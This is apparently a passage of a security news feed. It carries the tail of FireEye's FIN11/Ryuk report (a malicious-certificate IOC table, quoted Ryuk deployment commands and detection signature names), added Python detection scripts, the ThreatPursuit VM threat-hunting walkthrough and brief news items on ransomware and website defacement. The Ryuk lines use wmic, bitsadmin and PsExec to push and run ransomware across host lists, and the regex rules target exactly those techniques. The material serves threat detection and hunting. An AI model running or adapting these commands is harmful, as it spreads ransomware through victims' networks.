10/23/20 | 45.153.241.138:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com | f8a14846b7da416b14303bced5a6418f
10/23/20 | 45.153.241.146:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com | 01abdaf870d859f9c1fd76f0b0328a2b
10/23/20 | 45.153.241.153:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com | c2eaf144e21f3aef5fe4b1502d318ba6
10/23/20 | 45.153.241.158:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com | de54af391602f3deea19cd5e1e912316
10/23/20 | 45.153.241.167:443 | C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com | 5f6fa19ffe5735ff81b0e7981a864dc8
10/23/20 | 45.147.231.222:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com | ff54a7e6f51a850ef1d744d06d8e6caa
10/23/20 | 45.153.241.141:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com | 4cda9d0bece4f6156a80967298455bd5
10/26/20 | 74.118.138.139:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com | e317485d700bf5e8cb8eea1ec6a72a1a
10/26/20 | 108.62.12.12:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com | e0022cbf0dd5aa597fee73e79d2b5023
10/26/20 | 108.62.12.121:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com | 44e7347a522b22cdf5de658a4237ce58
10/26/20 | 172.241.27.65:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com | cd3e51ee538610879d6fa77fa281bc6f
10/26/20 | 172.241.27.68:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com | 04b6aec529b3656040a68e17afdabfa4
10/26/20 | 172.241.27.70:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com | 200c25c2b93203392e1acf5d975d6544
10/26/20 | 45.153.241.139:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com | 9d7c52c79f3825baf97d1318bae3ebe2
10/27/20 | 45.153.241.14:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com | 5bae28b0d0e969af2c0eda21abe91f35
10/28/20 | 190.211.254.154:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com | a1e62e7e547532831d0dd07832f61f54
10/28/20 | 81.17.28.70:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com | 67c7c75d396988ba7d6cd36f35def3e4
10/28/20 | 81.17.28.105:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com | 880e59b44e7175e62d75128accedb221
10/28/20 | 179.43.160.205:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com | cdea09a43bef7f1679e9cd1bbeb4b657
10/28/20 | 179.43.158.171:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com | 512c6e39bf03a4240f5a2d32ee710ce5
10/28/20 | 179.43.133.44:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com | 87f3698c743f8a1296babf9fbebafa9f
10/28/20 | 179.43.128.5:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com | 6df66077378c5943453b36bd3a1ed105
10/28/20 | 179.43.128.3:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com | 9706fd787a32a7e94915f91124de3ad3
10/28/20 | 81.17.28.122:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com | 0e1b0266de2b5eaf427f5915086b4d7c
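One defensive use of the certificate rows above is to screen observed TLS server certificates against them. The Python below is an added example, not code from the FireEye report: the MD5 values, server addresses and subject strings are copied from the table, while the observed-certificate records and their field names are constructed sample data rather than any sensor's native log format. Besides exact matches on hash, server and CN, it flags any certificate whose non-CN subject fields match the template shared by nearly every row (C=US, ST=TX, L=Texas, O=lol, empty OU), which also catches a new domain issued on the same template.

```python
"""Screen observed TLS server certificates against the certificate IOCs above.

Added example, not code from the FireEye report. IOC values are copied from
the table above; the observed records are constructed sample data and their
field names are an assumption, not any sensor's native log format.
"""
import re
from typing import Dict, List

# Certificate MD5s from the table above, used as an exact-match set.
IOC_CERT_MD5 = {
    "9859a8336d097bc30e6e5c7a8279f18e",
    "43fb2c153b59bf46cf6f67e0ddd6ef51",
    "0e1b0266de2b5eaf427f5915086b4d7c",
}

# Server addresses (IP:port) from the table above.
IOC_SERVERS = {"45.153.240.178:443", "45.153.240.220:443", "81.17.28.122:443"}

# Certificate subjects from the table above, still defanged with "[.]".
IOC_SUBJECTS = [
    "C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com",
    "C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com",
    "C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com",
]


def refang(value: str) -> str:
    """Turn the defanged '[.]' notation used in the table back into a real dot."""
    return value.replace("[.]", ".")


def parse_dn(dn: str) -> Dict[str, str]:
    """Split a comma-separated RDN string ('C=US,ST=TX,...,CN=x') into a dict.

    Empty values such as 'OU=' are kept: the empty OU is part of the template.
    Escaped commas inside values are not handled; none occur in the table.
    """
    fields = {}
    for part in dn.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


IOC_CNS = {parse_dn(refang(s))["CN"] for s in IOC_SUBJECTS}

# Every subject field except CN is identical across almost every row of the
# table, so the non-CN fields form a template worth matching on their own.
SUBJECT_TEMPLATE = {k: v for k, v in parse_dn(IOC_SUBJECTS[0]).items() if k != "CN"}


def check_cert(server: str, subject: str, md5: str) -> List[str]:
    """Return the (possibly empty) list of reasons this certificate is suspect."""
    reasons = []
    if md5.lower() in IOC_CERT_MD5:
        reasons.append("cert-md5")
    if server in IOC_SERVERS:
        reasons.append("server")
    dn = parse_dn(subject)
    if dn.get("CN") in IOC_CNS:
        reasons.append("cn")
    elif all(dn.get(k) == v for k, v in SUBJECT_TEMPLATE.items()):
        # Unknown CN, but the rest of the subject matches the shared template.
        reasons.append("subject-template")
    return reasons


def scan(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run check_cert over observed records and keep only those with a reason."""
    hits = []
    for rec in records:
        reasons = check_cert(rec["server"], rec["subject"], rec["md5"])
        if reasons:
            hits.append({"server": rec["server"], "reasons": reasons})
    return hits


# Constructed observed-certificate records (field layout is an assumption).
SAMPLE_RECORDS = [
    {"server": "45.153.240.178:443",
     "subject": "C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater.com",
     "md5": "9859a8336d097bc30e6e5c7a8279f18e"},
    # Unlisted CN on the same subject template (constructed name).
    {"server": "203.0.113.9:443",
     "subject": "C=US,ST=TX,L=Texas,O=lol,OU=,CN=example-newname.invalid",
     "md5": "0" * 32},
    # Ordinary corporate certificate (constructed); should not match.
    {"server": "198.51.100.7:443",
     "subject": "C=US,ST=CA,L=Los Angeles,O=Example Corp,OU=IT,CN=www.example.com",
     "md5": "f" * 32},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(hit["server"], ",".join(hit["reasons"]))
```

The template check is deliberately separate from the CN check: a hash or CN match is a hard indicator, while a template match on an unseen CN is a lead worth triaging rather than a confirmed hit, so the two should feed different alert severities.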

RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform: Endpoint Security

Signature Name:

  • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
  • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
  • POTENTIAL KEGTAP MALWARE ACTIVITY (BACKDOOR)
  • SINGLEMALT (DOWNLOADER)
  • STILLBOT (BACKDOOR)
  • WINEKEY (DOWNLOADER)
  • CORKBOT (BACKDOOR)

Platform: Network Security and Email Security

Signature Name:

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT
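The product signatures above are vendor-specific, but the "RYUK Commands" listed earlier also lend themselves to simple command-line detection in whatever process-creation telemetry an organization already collects. The following Python is an added example and is not FireEye's detection content: each rule encodes one pattern visible in those commands (wmic /node: with process call create, PsExec driven by an @file target list with -u/-p credentials, bitsadmin /transfer used as a downloader, and executables placed in %APPDATA% or C:\Windows\Temp). The sample events are constructed; the three command lines are kept as printed on the page, [REDACTED] tokens included, and the (label, command line) layout is an assumption rather than any EDR's native format.

```python
"""Flag process-creation events resembling the Ryuk deployment commands above.

Added example, not FireEye's detection content. The rules encode patterns
visible in the commands listed under "RYUK Commands"; the sample events are
constructed, with the page's commands kept as printed ([REDACTED] included)
and the (label, command line) layout an assumption.
"""
import re
from typing import List, Tuple

# (rule name, pattern); each pattern is searched across the full command line.
RULES = [
    # wmic /node:<targets> ... process call create <cmd>: remote execution on
    # every host named in the @file target list.
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(?:\.exe)?\b.*?/node:.*?\bprocess\s+call\s+create\b", re.I)),
    # PsExec fed a target list via @file together with explicit -u/-p credentials.
    ("psexec_target_list_with_creds",
     re.compile(r"\bpsexec(?:\.exe)?\b.*?\s@\S+.*?\s-u\s.*?\s-p\s", re.I)),
    # bitsadmin /transfer used as a file copier from inside a spawned cmd.exe.
    ("bitsadmin_transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b", re.I)),
    # An .exe referenced under %APPDATA% or \windows\temp (user-writable paths).
    ("exe_in_user_writable_dir",
     re.compile(r"(?:%APPDATA%|\\windows\\temp)\\[^\s\"']*\.exe\b", re.I)),
]


def match_rules(command_line: str) -> List[str]:
    """Return the names of all rules whose pattern matches this command line."""
    return [name for name, pattern in RULES if pattern.search(command_line)]


def scan_events(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Keep only events that trip at least one rule, paired with the rules tripped."""
    hits = []
    for label, cmdline in events:
        names = match_rules(cmdline)
        if names:
            hits.append((label, names))
    return hits


# Constructed events: the three command lines from the page plus benign noise.
SAMPLE_EVENTS = [
    ("evt-1", r'start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"'),
    ("evt-2", r'start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"'),
    ("evt-3", r'start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe'),
    ("evt-4", r"wmic os get caption,version"),                   # benign inventory query (constructed)
    ("evt-5", r"bitsadmin /list /allusers"),                      # benign BITS job listing (constructed)
    ("evt-6", r'"C:\Program Files\Example\updater.exe" /check'),  # benign, constructed path
]

if __name__ == "__main__":
    for label, names in scan_events(SAMPLE_EVENTS):
        print(label, ", ".join(names))
```

Any one rule alone will fire on legitimate administration (wmic and PsExec are common in IT tooling), which is why the scan returns the full set of rules tripped per event: two or more rules on the same command line, or the same rule across many hosts within minutes, is the combination that separates mass deployment from routine use.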

More Hospitals Hit by Growing Wave of Ransomware Attacks

Hospitals in New York and Oregon were targeted on Tuesday by threat actors who crippled systems and forced ambulances with sick patients to be rerouted, in some cases.

Russian Espionage Group Updates Custom Malware Suite

Turla has outfitted a trio of backdoors with new C2 tricks and increased interop, as seen in an attack on a European government.

Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine

Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats within a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM.

ThreatPursuit Virtual Machine (VM) is a fully customizable, open-source, Windows-based distribution focused on threat intelligence analysis and hunting, designed to get intel analysts, malware analysts and threat hunters up and running quickly. The threat intelligence analyst role is a subset and specialized member of the blue team. Individuals in this role generally have a strong impetus for knowing the threat environment. Often their traits, skills and experiences will vary depending on training and subject matter expertise.

Their expertise may not be technical and may include experiences and tradecraft earned by operating within a different domain (e.g., geospatial, criminal, signals intelligence, etc.). A key aspect of the role may include the requirement to hunt, study and triage previously undiscovered or recently emerging threats by discerning data for evil. Threat analysts apply a variety of structured analytical methods in order to develop meaningful and relevant products for their customers.

With this distribution we aim to enable users to:

  • Conduct hunting activities or missions
  • Create adversarial playbooks using evidence-based knowledge
  • Develop and apply a range of analytical products amongst datasets
  • Perform analytical pivoting across forensic artifacts and elements
  • Emulate advanced offensive security tradecraft
  • Enable situational awareness through intelligence sharing and reporting
  • Apply data science techniques and visualize clusters of symbolic data
  • Leverage open intelligence sources to provide unique insights for defense and offense

Akin to both FLARE-VM and Commando VM, ThreatPursuit VM uses Boxstarter, Chocolatey and MyGet packages to install software that facilitates the many aspects related to roles performed by analysts. The tools installed provide easy access to a broad range of tooling, including, but not limited to, threat analytics, statistics, visualisation, threat hunting, malware triage, adversarial emulation, and threat modelling. Here are some of the tools, but there are many more:

For a full list of tools, please visit our GitHub repository.

Installation

Similar to FLARE-VM and Commando VM, it's recommended to install ThreatPursuit VM in a virtual machine. The following is an overview of the minimal and recommended installation requirements.

Requirements

  • Windows 10 1903 or greater
  • 60 GB Hard Drive
  • 4 GB RAM

Recommended

  • Windows 10 1903
  • 80+ GB Hard Drive
  • 6+ GB RAM
  • 1 network adapter
  • OpenGL Graphics Card 1024mb
  • Enable Virtualization support for VM
    • Required for Docker (MISP, OpenCTI)

Standard Install

The easiest way to install ThreatPursuit VM is to use the following steps. This will install all the default tools and get you finding evil in no time!

  1. Create and configure a new Windows 10 VM with the aforementioned requirements.
    • Ensure VM is updated completely. You may need to check for updates, reboot and check again until no more remain.
  2. Install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing.
  3. Take a snapshot of your machine! This allows you to always have a clean state.
  4. Download and copy install.ps1 to your newly configured VM.
  5. Open PowerShell as an administrator.

Next, unblock the install file by running: Unblock-File .\install.ps1, as seen in Figure 1.


Figure 1: Unblock-File installation script

Enable script execution by running: Set-ExecutionPolicy Unrestricted -f, as seen in Figure 2.


Figure 2: Set-ExecutionPolicy Unrestricted -f script

Finally, execute the installer script as follows: .\install.ps1

After executing install.ps1, you’ll be prompted for the administrator password in order to automate host restarts during installation as several reboots occur. Optionally, you may pass your password as a command-line argument via ".\install.ps1 -password <password>". If you do not have a password set, hitting enter when prompted will also work.

This will be the last thing you will need to do before the installation is unattended. The script will set up the Boxstarter environment and proceed to download and install the ThreatPursuit VM environment, as seen in Figure 3.


Figure 3: Installation script execution

The installation process may take upwards of several hours depending on your internet connection speed and the web servers hosting the various files. Figure 4 shows the post-installation desktop environment, featuring the logo and a desktop shortcut; the VM's logo appearing on the desktop background is the sign that the install has finished.


Figure 4: ThreatPursuit VM desktop installed

Custom Install

Is the standard installation too much for you? We provide a custom installation method that allows you to choose which Chocolatey packages get installed. For additional details, see the Custom Install steps at our GitHub repository.

Installing Additional Packages

Since ThreatPursuit VM uses the Chocolatey Windows package manager, it's easy to install additional packages not included by default. For example, entering the command cinst github as administrator installs GitHub Desktop on your system.

To update all currently installed packages to their most recent versions, run the command cup all as administrator.

Getting Started: A Use Case

As threat analysts, what we choose to pursue will depend on the priorities and requirements of our current role. Often, they vary with each threat or adversary encountered such as financial crime, espionage, issue-motivated groups or individuals. The role broadly encompasses the collection and analysis of threat data (e.g., malware, indicators of attack/compromise) with the goal of triaging the data and developing actionable intelligence. For example, one may want to produce detection signatures based on malware network communications to classify, share or disseminate indicators of compromise (IOCs) in standardized ways. We may also use these IOCs in order to develop and apply analytical products that establish clusters of analogous nodes such as MITRE ATT&CK tactics and techniques, or APT groups. On the other hand, our goal can be as simple as triaging a malware sample behavior, hunting for indicators, or proving or disproving a hypothesis. Let's look at how we might start.

Open Hunting

To start our use case, let’s say we are interested in reviewing the latest threat actor activity reported for the quarter. We sign in to the Mandiant Advantage portal (Figure 5) using our public subscription to get a snapshot view of any highlighted activity (Figure 6).


Figure 5: Mandiant Advantage portal


Figure 6: Actor activity for Q3 2020

Based on the Mandiant Advantage report, we notice a number of highly active APT and FIN actors. We choose to drill into one of these actors by hovering our mouse and selecting the actor tag FIN11.

We receive a high-level snapshot summary view of the threat actor, their targeted industry verticals, associated reports and much more, as seen in Figure 7. We also may choose to select the most recent report associated with FIN11 for review.


Figure 7: FIN11 actor summary

By selecting the “View Full Page” button as seen at the top right corner of Figure 6, we can use the feature to download indicators, as seen in the top right corner of Figure 8.


Figure 8: Full FIN11 page

Within the FIN11 report, we review the associated threat intelligence tags that contain finished intelligence products. However, we are interested in the collection of raw IOCs (Figure 9) that we could leverage to pivot off or enrich our own datasets.


Figure 9: Downloaded FIN11 indicators

Using the Malware Information Sharing Platform (MISP) as our collection point, we are going to upload and triage our indicators using our local MISP instance running on ThreatPursuit VM.

Please note you will need to ensure your local MISP instance is running correctly with the configuration of your choosing. We select the “Add Event” button, begin populating all needed fields to prepare our import, and then click “Submit”, as shown in Figure 10.


Figure 10: MISP triage of events

Under the tags section of our newly created FIN11 event, we apply relevant tags to begin associating aspects of contextual information related to our target, as seen in Figure 11.


Figure 11: MISP Event setup for FIN11

We then select “Add Attribute” into our event, which will allow us to import our MD5 hashes into the MISP galaxy, as seen in Figure 12. Using both the category and type, we select the appropriate values that best represent our dataset and prepare to submit that data into our event.


Figure 12: MISP import events into FIN11 event

MISP allows for a streamlined way to drill and tag indicators as well as enrich and pivot with threat intelligence. We can also choose to perform this enrichment process within MISP using a variety of open intelligence sources and their modules, such as Mandiant Advantage, PassiveTotal, Shodan and VirusTotal. We can also achieve the same result using similar tools already packaged in ThreatPursuit VM.
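The "Add Attribute" step above is where the category and type of each indicator are chosen by hand. When a downloaded indicator list is more than a handful of entries, it is easier to classify the raw values first and hand MISP a ready-made event. The following Python is an added example, not code from ThreatPursuit VM or from MISP: it maps each indicator to a MISP attribute type and category, refangs defanged values, and assembles the JSON body that MISP's event API accepts. The hashes and the domain are values named on this page; the event description, the tlp:amber tag and the choice of distribution, threat level and analysis state are assumptions about how an analyst might file them, not values from the report.

```python
"""Build a MISP event body from a raw indicator list before uploading it.

Added example, not code from ThreatPursuit VM or MISP. The hashes and the
domain are values named on this page; the event metadata and tag are
assumptions about how to file them.
"""
import json
import re
from typing import Dict, List, Tuple

# MISP attribute types for hex digests, keyed by digest length in hex chars.
HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}


def refang(value: str) -> str:
    """Undo common defanging ('[.]', 'hxxp') so the stored value is usable."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def classify(ioc: str) -> Tuple[str, str]:
    """Map a raw indicator to a (MISP attribute type, MISP category) pair."""
    v = refang(ioc.strip())
    if re.fullmatch(r"[0-9a-fA-F]+", v) and len(v) in HASH_TYPES:
        return HASH_TYPES[len(v)], "Payload delivery"
    if re.fullmatch(r"(?:\d{1,3}\.){3}\d{1,3}", v):
        return "ip-dst", "Network activity"
    if re.match(r"https?://", v):
        return "url", "Network activity"
    if re.fullmatch(r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+", v):
        return "domain", "Network activity"
    raise ValueError(f"unrecognised indicator: {ioc!r}")


def build_misp_event(info: str, iocs: List[str], tags: List[str]) -> Dict:
    """Assemble the JSON body for MISP's event API, one attribute per IOC.

    to_ids=True marks every attribute as suitable for export to detection
    tools; distribution 0 keeps the event to our own organisation until the
    review is finished. Both are assumptions about local policy.
    """
    attributes = []
    seen = set()
    for ioc in iocs:
        value = refang(ioc.strip())
        if value in seen:          # indicator lists routinely contain duplicates
            continue
        seen.add(value)
        attr_type, category = classify(value)
        attributes.append({
            "type": attr_type,
            "category": category,
            "value": value,
            "to_ids": True,
        })
    return {
        "Event": {
            "info": info,
            "distribution": 0,       # 0 = this organisation only
            "threat_level_id": 2,    # 2 = medium
            "analysis": 0,           # 0 = initial
            "Tag": [{"name": t} for t in tags],
            "Attribute": attributes,
        }
    }


# Indicators taken from the walkthrough on this page (one duplicated on purpose).
FIN11_IOCS = [
    "113dd1e3caa47b5a6438069b15127707",
    "5d7d2371668ad4a6484f76b0b6511961",
    "3c43d080b5badfdde7aff732c066d1b2",
    "near-fast[.]com",
    "113dd1e3caa47b5a6438069b15127707",
]

if __name__ == "__main__":
    event = build_misp_event("FIN11 indicators from triage walkthrough", FIN11_IOCS, ["tlp:amber"])
    print(json.dumps(event, indent=2))
```

The body this produces is what a POST to the MISP events endpoint (or PyMISP's add_event) expects; keeping the classification in code means the type/category decision is reviewable and repeatable instead of being re-made in the form for every attribute.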

Using Maltego CE, installed as part of the VM, we can automate aspects of targeted collection and analysis of our FIN11 malware families and associated infrastructure. The following are just some of the Maltego plugins that can be configured post installation to help with the enrichment and collection process:

Targeting the suspected payload, we attempt to pivot using its MD5 hash value (113dd1e3caa47b5a6438069b15127707) to discover additional artifacts, such as infrastructure, domain record history, previously triaged reports, similar malware samples, timestamps, and the rich headers.

Importing our hash into Maltego CE, we can proceed to perform a range of queries to hunt and retrieve interesting information related to our FIN11 malware, as seen in Figure 13.


Figure 13: Maltego CE querying MD5 hash

Quite quickly we pull back indicators; in this case, generic named detection signatures from a range of anti-malware vendors. Using VirusTotalAPI Public, we perform a series of collection and triage queries across a variety of configured open sources, as shown in Figure 14.


Figure 14: Automating enrichment and analysis of targeted infrastructure

A visual link has been made public for quick reference.  

With our newly identified information obtained by passively scraping those IOCs from a variety of data providers, we can identify additional hashes, delivery URLs and web command and control locations, as shown in Figure 15.


Figure 15: Maltego visualization of FIN11 dropper

Pivoting on the suspected FIN11 delivery domain near-fast[.]com, we have found several more samples that were uploaded to the online malware sandbox website AppAnyRun. Within the ThreatPursuit VM Google Chrome browser and in the Tools directory, there are shortcuts and bookmarks to a range of sandboxes to help with accessing and searching them quickly. We can use AppAnyRun to further analyze the heterogeneous networks and execution behaviors of these acquired samples.

We have identified another similar sample, which is an XLS document named “MONITIORING REPORT.xls” with the MD5 hash 5d7d2371668ad4a6484f76b0b6511961 (Figure 16). Let’s attempt to triage this newly discovered sample and qualify the relationship back to FIN11.


Figure 16: VirusTotal execution report of 5d7d2371668ad4a6484f76b0b6511961

Extracting interesting strings and indicators from this sample allows us to compare these artifacts against our own dynamic analysis. If we can’t access the original malware sample, but we have other indicators to hunt with, we could also pivot on various unique characteristics and attributes (e.g., imphash, vthash, pdb string, etc.) to discover related samples.

Even without access to the sample, we can also use YARA to mine for similar malware samples. One such source to mine is the mquery tool and the datasets offered via CERT.PL. To fast track the creation of a YARA rule, we leverage the FIN11 YARA rule provided within the FIN11 Mandiant Advantage report. Simply copy and paste the YARA rule into the mquery page and select “Query” to perform the search (Figure 17). It may take some time, so be sure to check back later (here are the results).


Figure 17: mquery YARA rule hunting search for FIN11 malware

Within our mquery search, we find a generic signature hit on Win32_Spoonbeard_1_beta for the MD5 hash 3c43d080b5badfdde7aff732c066d1b2. We associate this MD5 hash with another sandbox, app.any.run, at the following URL:

  • https://app.any.run/tasks/19ac204b-9381-4127-a5ac-d6b68e0ee92c/

As seen in Figure 18, this sample was first uploaded on May 2, 2019, with an associated infection chain intact.

Figure 18: AppAnyRun Execution Report on 3c43d080b5badfdde7aff732c066d1b2

We now have a confident signature hit, but with different named detections on the malware family. This is a common challenge for threat analysts and researchers. However, we have gained interesting information about the malware itself, such as its execution behavior, encryption methods, dropped files, timelines, and command and control server and beacon information. This is more than enough for us to pivot across our own datasets to hunt for previously seen activities and prepare to finalize our report.

Once we are confident in our analysis, we can start to model and attribute the malware characteristics. We can leverage other threat exchange communities and intelligence sources to further enrich the information we collected on the sample. Enrichment allows analysts to extrapolate more context, such as timings, malware similarity, associated infrastructure, and prior targeting information. We will briefly add our content into our MISP instance and apply tags to finalize our review.

We may wish to add MITRE ATT&CK tags (Figure 19) relevant across the malware infection chain for our sample as they could be useful from a modelling standpoint.


Figure 19: MITRE ATT&CK tags for the malware sample

Final Thoughts

We hope you enjoyed this basic malware triage workflow use case using ThreatPursuit VM. There are many more tools and capabilities within the included toolset, such as machine learning (ML) algorithms that help threat hunters analyze large volumes of data quickly. Check out some of FireEye’s ML blog posts here.

For a complete list of tools please see the ThreatPursuit VM GitHub repository. We look forward to releasing more blog posts, content and playbooks as our user base grows.

And finally, here are some related articles that might be of interest.

Malware Analysis

Digital Forensics

Intelligence Analysis and Assessments

Trump campaign website defaced by scammers

Hackers broke into Donald Trump’s campaign website on Tuesday; the news is worrying because it comes a few days before Election Day.

Hackers defaced Donald Trump’s campaign website, donaldjtrump.com, displaying the following message:

“This site was seized.” “The world has had enough of the fake-news spreaded daily by president donald j trump.”


The hack was first reported by Gabriel Lorenzo Greschler on Twitter; it took place shortly before 4 PM Pacific time.

The news is worrying because it comes ahead of Election Day. Hackers likely gained access to the web server back-end and inserted obfuscated JavaScript to display the above message.

The website was quickly restored, and Trump campaign spokesman Tim Murtaugh confirmed that no sensitive data was compromised as a result of the attack.

“The Trump campaign website was defaced and we are working with law enforcement authorities to investigate the source of the attack,” Murtaugh said.

The attackers don’t appear to be politically motivated; according to TechCrunch, the site was hacked by scammers seeking to collect the hard-to-trace cryptocurrency Monero.

The scammers claimed to have confidential information on Trump and his relatives, and provided two Monero addresses to which funds could be transferred to receive the alleged information.

The scammers instructed people to send crypto-currency to one address if they wanted the strictly classified information released and to another to keep it secret.

Experts noticed that the page was signed with a PGP public key corresponding to an email address at a non-existent domain (planet.gov).

Pierluigi Paganini

(SecurityAffairs – hacking, Trump election day)

The post Trump campaign website defaced by scammers appeared first on Security Affairs.

Experts Weigh in on E-Commerce Security Amid Snowballing Threats

How a retail sector reeling from COVID-19 can lock down their online systems to prevent fraud during the upcoming holiday shopping spike.

Steelcase office furniture giant hit by Ryuk ransomware attack

Office furniture company Steelcase was hit by a Ryuk ransomware attack that forced it to shut down its network to prevent the malware from spreading.

Steelcase is a US-based furniture company that produces office furniture, architectural and technology products for office environments and the education, health care and retail industries. It is the largest office furniture manufacturer in the world. It has facilities, offices, and factories in the Americas, Europe, Asia, the Middle East, Australia and Africa.

Steelcase has 13,000 employees and $3.7 billion in revenue in 2020. The company is the latest victim of the Ryuk ransomware operators; the attack forced the firm to shut down its network to prevent the malware from spreading.

In an 8-K form filed with the Securities and Exchange Commission (SEC), the company has disclosed the ransomware attack that took place on October 22nd, 2020.

“On October 22, 2020, Steelcase Inc. (the “Company”) detected a cyberattack on its information technology systems. The Company promptly implemented a series of containment measures to address this situation including temporarily shutting down the affected systems and related operations.” reads the 8-K form.

The company immediately started the incident response procedure in an attempt to restore the affected systems and return to normal operations as soon as possible. The company is not aware of data loss caused by the ransomware attack.

Bleeping Computer, citing a source in the cybersecurity industry, confirmed that Steelcase suffered a Ryuk ransomware attack.

“At this time, the Company is not aware of any data loss from its systems or any other loss of assets as a result of this attack. Although cyberattacks can be unpredictable, the Company does not currently expect this incident will have a material impact on its business operations or its financial results.” continues the form.

Ryuk ransomware operators have been very active in recent weeks; the gang recently infected systems at Universal Health Services and the French IT outsourcer Sopra Steria.

In March, the City of Durham shut down its network after a Ryuk ransomware attack.

A few days before, EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, was hit by the Ryuk ransomware.

The list of the victims of the Ryuk ransomware is very long and includes the US government contractor Electronic Warfare Associates (EWA), US railroad company Railworks, Croatian petrol station chain INA Group, and parts manufacturer Visser Precision.

Threat actors behind Ryuk attacks often use BazarLoader or TrickBot infections to gain a foothold in the target networks and then deploy Ryuk.

Pierluigi Paganini

(SecurityAffairs – hacking, Steelcase)

The post Steelcase office furniture giant hit by Ryuk ransomware attack appeared first on Security Affairs.

Attacks on IoT devices continue to escalate

Attacks on IoT devices continue to rise at an alarming rate due to poor security protections and cybercriminals’ use of automated tools to exploit these vulnerabilities, according to Nokia.

IoT devices most infected

The report found that internet-connected, or IoT, devices now make up roughly 33% of infected devices, up from about 16% in 2019. The report’s findings are based on data aggregated from monitoring network traffic on more than 150 million devices globally. Adoption … More

The post Attacks on IoT devices continue to escalate appeared first on Help Net Security.

Enel Group suffered the second ransomware attack this year

Multinational energy company Enel Group has been hit by Netwalker ransomware operators that are asking a $14 million ransom.

